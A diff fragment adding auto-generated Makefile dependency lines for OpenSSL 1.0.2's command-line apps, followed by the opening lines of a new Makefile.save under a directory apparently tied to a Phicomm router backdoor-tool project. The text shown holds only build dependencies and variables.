+ocsp.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+ocsp.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+ocsp.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+ocsp.o: ../include/openssl/tls1.h ../include/openssl/txt_db.h
+ocsp.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+ocsp.o: ../include/openssl/x509v3.h apps.h ocsp.c
+openssl.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+openssl.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+openssl.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+openssl.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+openssl.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+openssl.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+openssl.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+openssl.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+openssl.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+openssl.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+openssl.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+openssl.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+openssl.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+openssl.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+openssl.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+openssl.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+openssl.o: ../include/openssl/tls1.h ../include/openssl/txt_db.h
+openssl.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+openssl.o: ../include/openssl/x509v3.h apps.h openssl.c progs.h s_apps.h
+passwd.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+passwd.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+passwd.o: ../include/openssl/crypto.h ../include/openssl/des.h
+passwd.o: ../include/openssl/des_old.h ../include/openssl/e_os2.h
+passwd.o: ../include/openssl/err.h ../include/openssl/evp.h
+passwd.o: ../include/openssl/lhash.h ../include/openssl/md5.h
+passwd.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+passwd.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+passwd.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+passwd.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+passwd.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+passwd.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+passwd.o: ../include/openssl/txt_db.h ../include/openssl/ui.h
+passwd.o: ../include/openssl/ui_compat.h ../include/openssl/x509.h
+passwd.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+passwd.o: passwd.c
+pkcs12.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkcs12.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkcs12.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkcs12.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkcs12.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkcs12.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkcs12.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkcs12.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkcs12.o: ../include/openssl/pem2.h ../include/openssl/pkcs12.h
+pkcs12.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+pkcs12.o: ../include/openssl/sha.h ../include/openssl/stack.h
+pkcs12.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+pkcs12.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+pkcs12.o: ../include/openssl/x509v3.h apps.h pkcs12.c
+pkcs7.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkcs7.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkcs7.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkcs7.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkcs7.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkcs7.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkcs7.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkcs7.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkcs7.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+pkcs7.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+pkcs7.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+pkcs7.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+pkcs7.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+pkcs7.o: pkcs7.c
+pkcs8.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkcs8.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkcs8.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkcs8.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkcs8.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkcs8.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkcs8.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkcs8.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkcs8.o: ../include/openssl/pem2.h ../include/openssl/pkcs12.h
+pkcs8.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+pkcs8.o: ../include/openssl/sha.h ../include/openssl/stack.h
+pkcs8.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+pkcs8.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+pkcs8.o: ../include/openssl/x509v3.h apps.h pkcs8.c
+pkey.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkey.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkey.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkey.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkey.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkey.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkey.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkey.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkey.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+pkey.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+pkey.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+pkey.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+pkey.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h pkey.c
+pkeyparam.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkeyparam.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkeyparam.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkeyparam.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkeyparam.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkeyparam.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkeyparam.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkeyparam.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkeyparam.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+pkeyparam.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+pkeyparam.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+pkeyparam.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+pkeyparam.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+pkeyparam.o: pkeyparam.c
+pkeyutl.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkeyutl.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkeyutl.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkeyutl.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkeyutl.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkeyutl.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkeyutl.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkeyutl.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkeyutl.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+pkeyutl.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+pkeyutl.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+pkeyutl.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+pkeyutl.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+pkeyutl.o: pkeyutl.c
+prime.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+prime.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+prime.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+prime.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+prime.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+prime.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+prime.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+prime.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+prime.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+prime.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+prime.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+prime.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+prime.o: prime.c
+rand.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+rand.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+rand.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+rand.o: ../include/openssl/err.h ../include/openssl/evp.h
+rand.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+rand.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+rand.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+rand.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+rand.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+rand.o: ../include/openssl/sha.h ../include/openssl/stack.h
+rand.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+rand.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+rand.o: ../include/openssl/x509v3.h apps.h rand.c
+req.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+req.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+req.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+req.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+req.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+req.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+req.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+req.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+req.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+req.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+req.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+req.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+req.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+req.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+req.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h req.c
+rsa.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+rsa.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+rsa.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+rsa.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+rsa.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+rsa.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+rsa.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+rsa.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+rsa.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+rsa.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+rsa.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+rsa.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+rsa.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+rsa.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h rsa.c
+rsautl.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+rsautl.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+rsautl.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+rsautl.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+rsautl.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+rsautl.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+rsautl.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+rsautl.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+rsautl.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+rsautl.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+rsautl.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+rsautl.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+rsautl.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+rsautl.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+rsautl.o: rsautl.c
+s_cb.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s_cb.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+s_cb.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+s_cb.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s_cb.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s_cb.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s_cb.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s_cb.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+s_cb.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s_cb.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s_cb.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s_cb.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+s_cb.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s_cb.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s_cb.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s_cb.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s_cb.o: ../include/openssl/tls1.h ../include/openssl/txt_db.h
+s_cb.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+s_cb.o: ../include/openssl/x509v3.h apps.h s_apps.h s_cb.c
+s_client.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s_client.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+s_client.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+s_client.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+s_client.o: ../include/openssl/err.h ../include/openssl/evp.h
+s_client.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+s_client.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+s_client.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+s_client.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s_client.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s_client.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s_client.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+s_client.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s_client.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s_client.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s_client.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s_client.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s_client.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+s_client.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+s_client.o: s_apps.h s_client.c timeouts.h
+s_server.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s_server.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+s_server.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+s_server.o: ../include/openssl/dh.h ../include/openssl/dtls1.h
+s_server.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s_server.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s_server.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s_server.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s_server.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+s_server.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s_server.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s_server.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s_server.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+s_server.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s_server.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s_server.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s_server.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s_server.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s_server.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+s_server.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+s_server.o: s_apps.h s_server.c timeouts.h
+s_socket.o: ../e_os.h ../e_os2.h ../include/openssl/asn1.h
+s_socket.o: ../include/openssl/bio.h ../include/openssl/buffer.h
+s_socket.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+s_socket.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+s_socket.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s_socket.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s_socket.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s_socket.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+s_socket.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s_socket.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s_socket.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s_socket.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s_socket.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s_socket.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s_socket.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s_socket.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s_socket.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+s_socket.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+s_socket.o: s_apps.h s_socket.c
+s_time.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s_time.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+s_time.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+s_time.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s_time.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s_time.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s_time.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s_time.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+s_time.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s_time.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s_time.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s_time.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s_time.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s_time.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s_time.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s_time.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s_time.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+s_time.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+s_time.o: s_apps.h s_time.c
+sess_id.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+sess_id.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+sess_id.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+sess_id.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+sess_id.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+sess_id.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+sess_id.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+sess_id.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+sess_id.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+sess_id.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+sess_id.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+sess_id.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+sess_id.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+sess_id.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+sess_id.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+sess_id.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+sess_id.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+sess_id.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+sess_id.o: sess_id.c
+smime.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+smime.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+smime.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+smime.o: ../include/openssl/err.h ../include/openssl/evp.h
+smime.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+smime.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+smime.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+smime.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+smime.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+smime.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+smime.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+smime.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+smime.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+smime.o: smime.c
+speed.o: ../e_os.h ../include/openssl/aes.h ../include/openssl/asn1.h
+speed.o: ../include/openssl/bio.h ../include/openssl/blowfish.h
+speed.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+speed.o: ../include/openssl/camellia.h ../include/openssl/cast.h
+speed.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+speed.o: ../include/openssl/des.h ../include/openssl/des_old.h
+speed.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+speed.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+speed.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+speed.o: ../include/openssl/lhash.h ../include/openssl/md4.h
+speed.o: ../include/openssl/md5.h ../include/openssl/mdc2.h
+speed.o: ../include/openssl/modes.h ../include/openssl/obj_mac.h
+speed.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+speed.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+speed.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+speed.o: ../include/openssl/rand.h ../include/openssl/rc2.h
+speed.o: ../include/openssl/rc4.h ../include/openssl/ripemd.h
+speed.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+speed.o: ../include/openssl/seed.h ../include/openssl/sha.h
+speed.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+speed.o: ../include/openssl/txt_db.h ../include/openssl/ui.h
+speed.o: ../include/openssl/ui_compat.h ../include/openssl/whrlpool.h
+speed.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+speed.o: ../include/openssl/x509v3.h apps.h speed.c testdsa.h testrsa.h
+spkac.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+spkac.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+spkac.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+spkac.o: ../include/openssl/err.h ../include/openssl/evp.h
+spkac.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+spkac.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+spkac.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+spkac.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+spkac.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+spkac.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+spkac.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+spkac.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+spkac.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+spkac.o: spkac.c
+srp.o: ../include/openssl/opensslconf.h srp.c
+ts.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ts.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+ts.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+ts.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+ts.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ts.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+ts.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ts.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+ts.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ts.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ts.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+ts.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+ts.o: ../include/openssl/sha.h ../include/openssl/stack.h
+ts.o: ../include/openssl/symhacks.h ../include/openssl/ts.h
+ts.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+ts.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h ts.c
+verify.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+verify.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+verify.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+verify.o: ../include/openssl/err.h ../include/openssl/evp.h
+verify.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+verify.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+verify.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+verify.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+verify.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+verify.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+verify.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+verify.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+verify.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+verify.o: verify.c
+version.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+version.o: ../include/openssl/blowfish.h ../include/openssl/bn.h
+version.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+version.o: ../include/openssl/crypto.h ../include/openssl/des.h
+version.o: ../include/openssl/des_old.h ../include/openssl/e_os2.h
+version.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+version.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+version.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+version.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+version.o: ../include/openssl/pkcs7.h ../include/openssl/rc4.h
+version.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+version.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+version.o: ../include/openssl/txt_db.h ../include/openssl/ui.h
+version.o: ../include/openssl/ui_compat.h ../include/openssl/x509.h
+version.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+version.o: version.c
+x509.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+x509.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+x509.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+x509.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+x509.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+x509.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+x509.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+x509.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+x509.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+x509.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+x509.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+x509.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+x509.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+x509.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+x509.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h x509.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/Makefile.save
new file mode 100644
index 0000000..d71d328
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/Makefile.save
@@ -0,0 +1,903 @@
+#
+#  apps/Makefile
+#
+
+DIR=		apps
+TOP=		..
+CC=		cc
